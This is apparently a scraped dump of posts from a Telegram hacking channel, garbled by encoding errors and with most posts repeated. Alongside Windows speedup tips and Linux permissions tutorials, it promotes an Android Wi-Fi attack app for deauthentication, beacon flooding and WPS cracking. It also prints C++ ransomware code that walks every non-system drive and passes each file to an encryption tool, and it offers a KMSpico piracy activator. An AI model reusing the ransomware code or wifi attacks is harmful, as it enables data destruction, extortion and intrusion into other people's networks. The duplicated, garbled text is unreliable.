β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How To SpeedUp my Windows :
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
A) Prevent programs from starting at system startup
1) on the computers of most Windows users there are a lot of applications that automatically start when the system is turned on. Basically, this is factory software installed by the manufacturer, and another, the autorun of which has not been canceled or it was deliberately turned on.
2) Particularly severely, a decrease in performance is felt precisely at computer startup, when it loads the desktop and at the same time tries to launch a host of other applications. This significantly slows down the operation of the device, therefore it is necessary to minimize the number of programs with autostart. You can disable the automatic start function using the Task Manager .
3) If you use Windows 7 or Windows XP, then msconfig will be a good utility for disabling autorun .
B)1) Use less applications at a time, reduce the load on RAM (RAM) to improve performance
2)Using several applications at the same time can increase your productivity if, for example, you are working as a designer and you need to open Adobe Photoshop with Adobe Illustrator at the same time, however this creates an additional load for your PC. In most cases, the processor (CPU) does not suffer as much as RAM (RAM), since RAM is the main resource used.
3)Try launching the Task Manager and monitor the memory usage in the Performance> Memory tab . If statistics show that programs are loading RAM, you can easily track the software guilty of this in the Processes tab , which will allow you to improve the performance of a Windows 10 device.
C ) Filling the system memory, respectively, slows down the computer. Adding more RAM is one of the options that can solve the issue of low performance, but this will require some financial costs. A less effective way to help slow down Windows 10 is to increase the size of the Paging File .
D) Check if your operating system is damaged
1) Damaged data can lead to the fact that your computer with Windows 10 will run extremely slowly, and in the worst cases, even crash.
2) One easy way to fix corrupted data on Windows 10 is to run a system file checker utility. It is likely that you are already familiar with it, if you had previously used it in attempts to restore your hard drive or USB drive. Fixing such damaged files can certainly speed up Windows 10.
3) How do I run the System File Checker (System File Checker) in Windows 10?
Use the command line for this and, opening it, enter the following command:
sfc / scannow
D ) Scan your PC for malware
E) Shutting down and restarting Windows is not even an option. It is a necessity.
Unfortunately, some users neglect this rule and their personal computers can be in an active state day and night, even if their owner is already sleeping for five hours, forgetting that his device also needs to βShut Downβ or at least βReboot
F) Make your Windows as ugly as possible.
Eliminate animations and all special effects.
Our modern PCs have an operating system in which the developers tried to make everything look great, was filled with various animations and effects, since this makes the process of working with the device much more pleasant. Everything good usually has a different side - these visual improvements consume system resources sometimes more than we would like. Not all PCs have powerful enough components to allow themselves to function effectively while maintaining all the visual amenities on the screen.
>My computer (right-click on the icon) > Properties> Advanced system settings> Settings (in the Performance section ).
In the Performance Options window, select Ensure the best performance If it doesnβt suit you with something, you can always set User Preferences and enable / disable certain effects at will.
G) Make sure Windows always gets the latest updates
H) Turn off cloud sync to speed up Windows 10
I) Use Quick Start to Reduce Your Computerβs Boot Time
π¦ How To SpeedUp my Windows :
t.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
A) Prevent programs from starting at system startup
1) on the computers of most Windows users there are a lot of applications that automatically start when the system is turned on. Basically, this is factory software installed by the manufacturer, and another, the autorun of which has not been canceled or it was deliberately turned on.
2) Particularly severely, a decrease in performance is felt precisely at computer startup, when it loads the desktop and at the same time tries to launch a host of other applications. This significantly slows down the operation of the device, therefore it is necessary to minimize the number of programs with autostart. You can disable the automatic start function using the Task Manager .
3) If you use Windows 7 or Windows XP, then msconfig will be a good utility for disabling autorun .
B)1) Use less applications at a time, reduce the load on RAM (RAM) to improve performance
2)Using several applications at the same time can increase your productivity if, for example, you are working as a designer and you need to open Adobe Photoshop with Adobe Illustrator at the same time, however this creates an additional load for your PC. In most cases, the processor (CPU) does not suffer as much as RAM (RAM), since RAM is the main resource used.
3)Try launching the Task Manager and monitor the memory usage in the Performance> Memory tab . If statistics show that programs are loading RAM, you can easily track the software guilty of this in the Processes tab , which will allow you to improve the performance of a Windows 10 device.
C ) Filling the system memory, respectively, slows down the computer. Adding more RAM is one of the options that can solve the issue of low performance, but this will require some financial costs. A less effective way to help slow down Windows 10 is to increase the size of the Paging File .
D) Check if your operating system is damaged
1) Damaged data can lead to the fact that your computer with Windows 10 will run extremely slowly, and in the worst cases, even crash.
2) One easy way to fix corrupted data on Windows 10 is to run a system file checker utility. It is likely that you are already familiar with it, if you had previously used it in attempts to restore your hard drive or USB drive. Fixing such damaged files can certainly speed up Windows 10.
3) How do I run the System File Checker (System File Checker) in Windows 10?
Use the command line for this and, opening it, enter the following command:
sfc / scannow
D ) Scan your PC for malware
E) Shutting down and restarting Windows is not even an option. It is a necessity.
Unfortunately, some users neglect this rule and their personal computers can be in an active state day and night, even if their owner is already sleeping for five hours, forgetting that his device also needs to βShut Downβ or at least βReboot
F) Make your Windows as ugly as possible.
Eliminate animations and all special effects.
Our modern PCs have an operating system in which the developers tried to make everything look great, was filled with various animations and effects, since this makes the process of working with the device much more pleasant. Everything good usually has a different side - these visual improvements consume system resources sometimes more than we would like. Not all PCs have powerful enough components to allow themselves to function effectively while maintaining all the visual amenities on the screen.
>My computer (right-click on the icon) > Properties> Advanced system settings> Settings (in the Performance section ).
In the Performance Options window, select Ensure the best performance If it doesnβt suit you with something, you can always set User Preferences and enable / disable certain effects at will.
G) Make sure Windows always gets the latest updates
H) Turn off cloud sync to speed up Windows 10
I) Use Quick Start to Reduce Your Computerβs Boot Time
One way to speed up the Windows 10 startup process is to enable the sleep mode feature, which is disabled by default. Quick start (enabled by default) is another feature that reduces the startup time of the operating system.
You can check if Quick Launch is enabled on your computer by choosing Power> Actions of the power buttons . Click Change settings that are currently unavailable to unlock the shutdown configuration. There you will see the ability to enable or disable the quick launch function.
Written by UndercOde For More or any doubt feel free to ask us
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
You can check if Quick Launch is enabled on your computer by choosing Power> Actions of the power buttons . Click Change settings that are currently unavailable to unlock the shutdown configuration. There you will see the ability to enable or disable the quick launch function.
Written by UndercOde For More or any doubt feel free to ask us
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ If You have a rooted android don t missed this new tool one of the best wifi hacking :
t.me/UndercOdeTesting
> Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android
π¦πβπππΈπππππΈπππβ & βπβ:
1) apk from :
https://github.com/chrisk44/Hijacker/releases
(official)
2) require rooted android 5+
π¦ FEATURES :
1) Information Gathering
2) View a list of access points and stations (clients) around you (even hidden ones)
3) View the activity of a specific network (by measuring beacons and data packets) and its clients
4) Statistics about access points and stations
5) See the manufacturer of a device (AP or station) from the OUI database
6) See the signal power of devices and filter the ones that are closer to you
7) Save captured packets in .cap file
Attacks
8) Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
9) Deauthenticate a specific client from the network it's connected
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or to every nearby AP
10) Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
ENJOY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ If You have a rooted android don t missed this new tool one of the best wifi hacking :
t.me/UndercOdeTesting
> Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android
π¦πβπππΈπππππΈπππβ & βπβ:
1) apk from :
https://github.com/chrisk44/Hijacker/releases
(official)
2) require rooted android 5+
π¦ FEATURES :
1) Information Gathering
2) View a list of access points and stations (clients) around you (even hidden ones)
3) View the activity of a specific network (by measuring beacons and data packets) and its clients
4) Statistics about access points and stations
5) See the manufacturer of a device (AP or station) from the OUI database
6) See the signal power of devices and filter the ones that are closer to you
7) Save captured packets in .cap file
Attacks
8) Deauthenticate all the clients of a network (either targeting each one (effective) or without specific target)
9) Deauthenticate a specific client from the network it's connected
MDK3 Beacon Flooding with custom options and SSID list
MDK3 Authentication DoS for a specific network or to every nearby AP
10) Capture a WPA handshake or gather IVs to crack a WEP network
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
ENJOY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is Exactly a Hijacking attack ?
fb.com/UndercOdeTestingCompany
1) Hijacking is a type of network security attack in which the attacker takes control of a communication - just as an airplane hijacker takes control of a flight - between two entities and masquerades as one of them.
2) one type of hijacking (also known as a man in the middle attack), the perpetrator takes control of an established connection while it is in progress.
3) The attacker intercepts messages in a public key exchange and then retransmits them, substituting their own public key for the requested one, so that the two original parties still appear to be communicating with each other directly.
4) The attacker uses a program that appears to be the server to the client and appears to be the client to the server.
5) This attack may be used simply to gain access to the messages, or to enable the attacker to modify them before retransmitting them.
6) Another form of hijacking is browser hijacking, in which a user is taken to a different site than the one the user requested. There are two different types of domain name system (DNS) hijacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is Exactly a Hijacking attack ?
fb.com/UndercOdeTestingCompany
1) Hijacking is a type of network security attack in which the attacker takes control of a communication - just as an airplane hijacker takes control of a flight - between two entities and masquerades as one of them.
2) one type of hijacking (also known as a man in the middle attack), the perpetrator takes control of an established connection while it is in progress.
3) The attacker intercepts messages in a public key exchange and then retransmits them, substituting their own public key for the requested one, so that the two original parties still appear to be communicating with each other directly.
4) The attacker uses a program that appears to be the server to the client and appears to be the client to the server.
5) This attack may be used simply to gain access to the messages, or to enable the attacker to modify them before retransmitting them.
6) Another form of hijacking is browser hijacking, in which a user is taken to a different site than the one the user requested. There are two different types of domain name system (DNS) hijacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Most Active Spyware 2019-2020 From All Reports
Instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Adware
Adware is a common type of spyware mainly used by advertisers. When you go online, it records your web surfing habits to gather information on the type of sites you search for. This information is used to direct marketing pop-ups and spam email.
2) Keyboard Logger
Keyboard logger spyware is a malicious program used by hackers. This program is designed to steal personal information by logging the actual keystrokes you type on your computer. When you enter a PIN, password, or credit card number the keyword logger records it for the hacker. This information can be used to access systems and commit identity theft and fraud.
3) Modem Hijacker
Modem hijackers tie into your phone line to make unauthorized calls and access member websites through your online connection. Usually this spyware program is used to phone premium rate phone numbers and access elicit websites such as porno sites. You don't know about the access and calls until you see the unauthorized charges on you bill.
4) Browser Hijacker
Browser hijacker spyware effects your Internet access by resetting your homepage and bookmarks. The goal is to direct you to undesirable sites with advertising spam. These programs are also data miners, recording your browsing activities and selling the information to advertisers.
5) Commercial Spyware
Not all spyware is unauthorized. In some cases, companies that provide free software and social networking platforms require you to agree to monitoring with spyware in order to access their systems. They then direct targeted advertising at you when you use their system. In this case you trade some of your privacy to access a free software.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Most Active Spyware 2019-2020 From All Reports
Instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Adware
Adware is a common type of spyware mainly used by advertisers. When you go online, it records your web surfing habits to gather information on the type of sites you search for. This information is used to direct marketing pop-ups and spam email.
2) Keyboard Logger
Keyboard logger spyware is a malicious program used by hackers. This program is designed to steal personal information by logging the actual keystrokes you type on your computer. When you enter a PIN, password, or credit card number the keyword logger records it for the hacker. This information can be used to access systems and commit identity theft and fraud.
3) Modem Hijacker
Modem hijackers tie into your phone line to make unauthorized calls and access member websites through your online connection. Usually this spyware program is used to phone premium rate phone numbers and access elicit websites such as porno sites. You don't know about the access and calls until you see the unauthorized charges on you bill.
4) Browser Hijacker
Browser hijacker spyware effects your Internet access by resetting your homepage and bookmarks. The goal is to direct you to undesirable sites with advertising spam. These programs are also data miners, recording your browsing activities and selling the information to advertisers.
5) Commercial Spyware
Not all spyware is unauthorized. In some cases, companies that provide free software and social networking platforms require you to agree to monitoring with spyware in order to access their systems. They then direct targeted advertising at you when you use their system. In this case you trade some of your privacy to access a free software.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransoware the Cryptolocker 2019
t.me/iOsDeveloppers
π¦ ππΌππ πππΈβπ :
1) Strong AES Encryption. (Unbreakable)
2) Lockdown System Functionailty.
3) Multi-Thread Encryption.
4) Powerful Web Admin Interface
5) encrypt all file, lock down the system(pc) and send keys back to the server
π¦informations from :
https://github.com/ajayrandhawa/Cryptolocker
π¦ Getting all files from all drive to encrypting them:
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use.
> use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
2) Encrypt files :
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
3) Create Long String Complex Password Function:
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
π¦This Popular Trick between hacker,
non-tested by undercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Ransoware the Cryptolocker 2019
t.me/iOsDeveloppers
π¦ ππΌππ πππΈβπ :
1) Strong AES Encryption. (Unbreakable)
2) Lockdown System Functionailty.
3) Multi-Thread Encryption.
4) Powerful Web Admin Interface
5) encrypt all file, lock down the system(pc) and send keys back to the server
π¦informations from :
https://github.com/ajayrandhawa/Cryptolocker
π¦ Getting all files from all drive to encrypting them:
Here is Visual C++ program get all list directory & files in drive and store path in text file for encryption later use.
> use Boost C++ libraries to get all files list. Please first setup Boost libraries to compile program.
#include <boost/config/warning_disable.hpp>
#include <boost/filesystem.hpp>
#include <iostream>
#include <iterator>
#include <stdio.h>
#include <windows.h>
using namespace std;
fstream out_file("data.txt", ios::out);
#define MAX 256
int main(int argc, char* argv[]) {
int dr_type = 99;
char dr_avail[MAX];
char *temp = dr_avail;
/* 1st we fill the buffer */
GetLogicalDriveStrings(MAX, dr_avail);
while (*temp != NULL) { // Split the buffer by null
dr_type = GetDriveType(temp);
char skip[10] = "C:\\";
if (dr_type == 3 && temp[0] != 'C') {
boost::system::error_code dir_error;
for (boost::filesystem::recursive_directory_iterator end, dir(temp, dir_error); dir != end; dir.increment(dir_error)) {
if (dir_error.value()) {
cerr << "Error accessing file: " << dir_error.message() << endl;
}
else {
cout << dir->path() << endl;
out_file << dir->path() << "\n";
}
}
}
temp += lstrlen(temp) + 1;
}
out_file.close();
system("pause");
2) Encrypt files :
Here firstly I get every file path from "data.txt" line by line and send to this crypy tool with type encryption and password. you can also embed all this program in upper loop for getting path and encrypting data recursively.
out_file.open("data.txt", ios::in);
string line;
while (out_file.good()) {
getline(out_file, line);
cout << line << endl;
std::string cmmd = "crpt.exe -e -p 4321 ";
cmmd += line;
system(cmmd.c_str());
}
3) Create Long String Complex Password Function:
Send length to function and function return complex long generated password which you can use for encryption.
string RandomString(int len)
{
srand(time(0));
string str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
string newstr;
int pos;
while (newstr.size() != len) {
pos = ((rand() % (str.size() - 1)));
newstr += str.substr(pos, 1);
}
return newstr;
}
π¦This Popular Trick between hacker,
non-tested by undercOde
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Telegram
iUNDERCODE IOS JAILBREAK SUPPORT & HELP
WELCOME TO iUNDERCODE BY UNDERCODE TESTING FOR IOS JAILBREAK & TWEAKS GROUP RULES @UNDERCODERULES
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
ππΎππππ±π ΄
Youtube.com/c/Undercode
π ΅π°π ²π ΄π±πΎπΎπ Ί
@UndercOdeTesting
@iUNDERCODE
π Έπ ½πππ°π Άππ°π Ό
@UndercOdeTestinG
@iUNDERCODE
πππ Έπππ ΄π
@iUNDERCODE
@UNDERCODENEWS
π¦ All Unstable-Termux Packages Termux updated 2020 from 1 h
install it via
> pkg install unstable-repo
install it via
> pkg install unstable-repo
Forwarded from U
12345
password
password
Forwarded from U
KMSpico.zip
3 MB
Official kms activator
Office /Windows
Office /Windows
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best free Webhost :
> t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Localtunnel
(recommended by UndercOde)
> Localtunnel is a free tunneling solution, to host your local web applications over the cloud and access the app from the publicly accessible web url.
> npm install -g localtunnel
2) Once the installation is complete, you can simply create a tunnel as shown below, for any port that will forward the request to the locally hosted and running application.
> lt --port 3000
your url is: https://ordinary-parrot-7.localtunnel.me
The above url can be simply accessed to view the locally hosted app on port 3000 (i.e. the port for which the tunnel was actually created).
Specifying a subdomain for your tunnel is also possible, through the subdomain flag. This will allow you to have a custom sub-domain which will be easy to remember.
> lt --port 3000 --subdomain mynodejsapp
3) You will get the url for your subdomain as shown below (subject to the availability).
https://mynodejsapp.localtunnel.me
B) Serveo
C) Teleconsole
D) Pagekite
MOre..
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Best free Webhost :
> t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Localtunnel
(recommended by UndercOde)
> Localtunnel is a free tunneling solution, to host your local web applications over the cloud and access the app from the publicly accessible web url.
> npm install -g localtunnel
2) Once the installation is complete, you can simply create a tunnel as shown below, for any port that will forward the request to the locally hosted and running application.
> lt --port 3000
your url is: https://ordinary-parrot-7.localtunnel.me
The above url can be simply accessed to view the locally hosted app on port 3000 (i.e. the port for which the tunnel was actually created).
Specifying a subdomain for your tunnel is also possible, through the subdomain flag. This will allow you to have a custom sub-domain which will be easy to remember.
> lt --port 3000 --subdomain mynodejsapp
3) You will get the url for your subdomain as shown below (subject to the availability).
https://mynodejsapp.localtunnel.me
B) Serveo
C) Teleconsole
D) Pagekite
MOre..
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
This media is not supported in your browser
VIEW IN TELEGRAM
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Explanation of Linux permissions and ownership Part1 BY UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
> One user, one group-
1) let's take a look at the Linux permissions and ownership model. We have seen that each file belongs to a user and a group. This is the core of the permissions model in Linux. You can view the users and groups in the ls -l list:
$ ls -l / bin / bash
-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash In this particular example, / bin / The bash executable belongs to the root user and is in the wheel group.
2) The Linux permission model works by allowing three separate permission levels to be set for each file system objectβthey are the owner of the file, the group of files, and all other users.
Understanding "ls -l"
3) Let's take a look at our ls -l output and check the first column of this list:
$ ls -l / bin / bash-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash The first field -rwxr-xr-x contains a symbolic representation of the permissions of this special file. The first character (-) in this field specifies the type of the file, which in this case is a regular file. Other possible first characters are:
4) "d" directory "l" symbolic link "c" character special device file "b" block special device file "p" FIFO "s" socket three triples $ ls -l / bin / bash-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash The rest of this field consists of three triplet characters. The first triad represents the permissions of the file owner, the second represents the permissions of the file's group, and the third represents the permissions of all other users:
5) Above "rwx" "rx" "rx", r means allow reading (view data in file), w means allow writing (modify file and delete), and x means allow "execute" (run program). Putting all this information together, we can find that everyone can read the contents of the file and execute the file, but only the file owner (root user) is allowed to modify the file in any way. Therefore, although the average user can copy the file, only the root user is allowed to update or delete it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Explanation of Linux permissions and ownership Part1 BY UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
> One user, one group-
1) let's take a look at the Linux permissions and ownership model. We have seen that each file belongs to a user and a group. This is the core of the permissions model in Linux. You can view the users and groups in the ls -l list:
$ ls -l / bin / bash
-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash In this particular example, / bin / The bash executable belongs to the root user and is in the wheel group.
2) The Linux permission model works by allowing three separate permission levels to be set for each file system objectβthey are the owner of the file, the group of files, and all other users.
Understanding "ls -l"
3) Let's take a look at our ls -l output and check the first column of this list:
$ ls -l / bin / bash-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash The first field -rwxr-xr-x contains a symbolic representation of the permissions of this special file. The first character (-) in this field specifies the type of the file, which in this case is a regular file. Other possible first characters are:
4) "d" directory "l" symbolic link "c" character special device file "b" block special device file "p" FIFO "s" socket three triples $ ls -l / bin / bash-rwxr-xr-x 1 root wheel 430540 Dec 23 18:27 / bin / bash The rest of this field consists of three triplet characters. The first triad represents the permissions of the file owner, the second represents the permissions of the file's group, and the third represents the permissions of all other users:
5) Above "rwx" "rx" "rx", r means allow reading (view data in file), w means allow writing (modify file and delete), and x means allow "execute" (run program). Putting all this information together, we can find that everyone can read the contents of the file and execute the file, but only the file owner (root user) is allowed to modify the file in any way. Therefore, although the average user can copy the file, only the root user is allowed to update or delete it.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Explanation of Linux permissions and ownership Part2 BY UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) who am I? Before we look at how to change the user and group ownership of a file, let's first look at how to know your current user ID and group membership.
> Unless you have recently used the su command, your current user ID is the user ID you use to log in to the system. However, if you use su often, you may not remember your currently valid user ID.
2) To see the user ID, enter whoami: # whoamiroot # su drobbins $ whoamidrobbins What group am I in? To see which group you belong to, use the group command: $ groupsdrobbins wheel audio In the example above, I am a member of the drobbins, wheel, and audio groups. If you want to see what groups other users are in, specify their username as a parameter:
γγ
γ$ groups root daemonroot: root bin daemon sys adm disk wheel floppy dialout tape videodaemon: daemon bin adm change user and group ownership in order to change files or other files Owner or group of system objects, use chown or chgrp, respectively. Both commands take a username or group name as an argument, followed by one or more file names.
γγ
3) # chown root / etc / passwd # chgrp wheel / etc / passwd You can also set the owner and group at the same time using another form of the chown command:
γγ
4) γ# chown root.wheel / etc / passwd Unless you are a super user, you cannot use chown, but anyone can use chgrp to change the file's group ownership to the group they belong to.
γγ
5) γRecursive ownership changes both chown and chgrp have an -R option, which can be used to tell them to recursively apply ownership and group changes to the entire directory tree. For example: # chown -R drobbins / home / drobbins introduces that chmodchown and chgrp can be used to change the owner and group of file system objects, while another programβcalled chmodβis used to change what we can see in the ls -l list rwx permissions. chmod takes two or more parameters: "mode", describing how to change permissions, followed by a file or list of files that will be affected: $ chmod + x scriptfile.sh In the example above, our "mode" is + x. As you might guess, the + x mode tells chmod to make this special file executable for users, groups, and anyone else. If we want to remove all execute permissions for a file, we should do this: $ chmod -x scriptfile.sh user / group / other granularity So far, our chmod example has affected all three triples β users, groups And all other users.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Explanation of Linux permissions and ownership Part2 BY UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) who am I? Before we look at how to change the user and group ownership of a file, let's first look at how to know your current user ID and group membership.
> Unless you have recently used the su command, your current user ID is the user ID you use to log in to the system. However, if you use su often, you may not remember your currently valid user ID.
2) To see the user ID, enter whoami: # whoamiroot # su drobbins $ whoamidrobbins What group am I in? To see which group you belong to, use the group command: $ groupsdrobbins wheel audio In the example above, I am a member of the drobbins, wheel, and audio groups. If you want to see what groups other users are in, specify their username as a parameter:
γγ
γ$ groups root daemonroot: root bin daemon sys adm disk wheel floppy dialout tape videodaemon: daemon bin adm change user and group ownership in order to change files or other files Owner or group of system objects, use chown or chgrp, respectively. Both commands take a username or group name as an argument, followed by one or more file names.
γγ
3) # chown root / etc / passwd # chgrp wheel / etc / passwd You can also set the owner and group at the same time using another form of the chown command:
γγ
4) γ# chown root.wheel / etc / passwd Unless you are a super user, you cannot use chown, but anyone can use chgrp to change the file's group ownership to the group they belong to.
γγ
5) γRecursive ownership changes both chown and chgrp have an -R option, which can be used to tell them to recursively apply ownership and group changes to the entire directory tree. For example: # chown -R drobbins / home / drobbins introduces that chmodchown and chgrp can be used to change the owner and group of file system objects, while another programβcalled chmodβis used to change what we can see in the ls -l list rwx permissions. chmod takes two or more parameters: "mode", describing how to change permissions, followed by a file or list of files that will be affected: $ chmod + x scriptfile.sh In the example above, our "mode" is + x. As you might guess, the + x mode tells chmod to make this special file executable for users, groups, and anyone else. If we want to remove all execute permissions for a file, we should do this: $ chmod -x scriptfile.sh user / group / other granularity So far, our chmod example has affected all three triples β users, groups And all other users.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Linux Tutorial Part 3
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) By using the = operator, we can tell chmod that we want to specify permissions and cancel other permissions: $ chmod = rx scriptfile.sh Above, we only set all the "read" and "execute" bits, not all the "write" "Bit. If you just want to reset a specific triple, you can specify the symbolic name of the triple before the = like this:
γγ
γγ$ chmod u = rx scriptfile.sh
γγ
γγNumber mode
γγ
2) γUntil now, we used a mode called "symbols" to specify permission changes with chmod. However, there is another common method of assigning permissions β using a 4-digit octal number.
3) Using a syntax called numeric rights syntax, each bit represents a rights triple. For example, in 1777, 777 sets the "owner", "group", and "other" flags we discussed in this chapter. 1 is used to set special permission bits, which we will cover at the end of this chapter. This chart illustrates how to interpret the second to fourth digits (777):
γγ
γγpattern numbers
γγrwx 7
γγrw- 6
γγrx 5
γγr-- 4
γγ-wx 3
γγ-w- 2
γγ--x 1
γγ--- 0
γγ
γγnumber permission syntax
γγ
4) γwhen you need to give The numeric permissions syntax is particularly useful when all permissions are specified on a file, such as in the following example:
γγ
γγ$ chmod 0755 scriptfile.sh
γγ
γγ$ ls -l scriptfile.sh
γγ
γγ-rwxr-xr-x 1 drobbins drobbins 0 Jan 9 17:44 scriptfile.sh
γγ
5) In this example, we used 0755 mode, which expands to a full permission setting "-rwxr-xr-x".
γγ
γγUmask
γγ
6) When a process creates a new file, it specifies the permissions that the new file should have. Typically, the requested mode is 0666 (readable and writable by everyone), which has more permissions than we would like. Fortunately, whenever a new file is created, Linux will refer to something called "umask". The system uses the umask value to reduce the initially specified permissions to more reasonable and secure permissions. You can view your current umask settings by entering umask on the command line:
γγ
γγ$ umask
γγ
γγ0022 On
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Linux Tutorial Part 3
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) By using the = operator, we can tell chmod that we want to specify permissions and cancel other permissions: $ chmod = rx scriptfile.sh Above, we only set all the "read" and "execute" bits, not all the "write" "Bit. If you just want to reset a specific triple, you can specify the symbolic name of the triple before the = like this:
γγ
γγ$ chmod u = rx scriptfile.sh
γγ
γγNumber mode
γγ
2) γUntil now, we used a mode called "symbols" to specify permission changes with chmod. However, there is another common method of assigning permissions β using a 4-digit octal number.
3) Using a syntax called numeric rights syntax, each bit represents a rights triple. For example, in 1777, 777 sets the "owner", "group", and "other" flags we discussed in this chapter. 1 is used to set special permission bits, which we will cover at the end of this chapter. This chart illustrates how to interpret the second to fourth digits (777):
γγ
γγpattern numbers
γγrwx 7
γγrw- 6
γγrx 5
γγr-- 4
γγ-wx 3
γγ-w- 2
γγ--x 1
γγ--- 0
γγ
γγnumber permission syntax
γγ
4) γwhen you need to give The numeric permissions syntax is particularly useful when all permissions are specified on a file, such as in the following example:
γγ
γγ$ chmod 0755 scriptfile.sh
γγ
γγ$ ls -l scriptfile.sh
γγ
γγ-rwxr-xr-x 1 drobbins drobbins 0 Jan 9 17:44 scriptfile.sh
γγ
5) In this example, we used 0755 mode, which expands to a full permission setting "-rwxr-xr-x".
γγ
γγUmask
γγ
6) When a process creates a new file, it specifies the permissions that the new file should have. Typically, the requested mode is 0666 (readable and writable by everyone), which has more permissions than we would like. Fortunately, whenever a new file is created, Linux will refer to something called "umask". The system uses the umask value to reduce the initially specified permissions to more reasonable and secure permissions. You can view your current umask settings by entering umask on the command line:
γγ
γγ$ umask
γγ
γγ0022 On
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LINUX TUTORIAL PART 4:
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) Linux systems, the default value of umask is generally 0022, which allows others to read your new files (if they can get them), It cannot be modified. To make new files more secure by default, you can change the umask setting: $ umask 0077umask will ensure that groups and other users have absolutely no permissions on the newly created files.
π¦ So how does umask work?
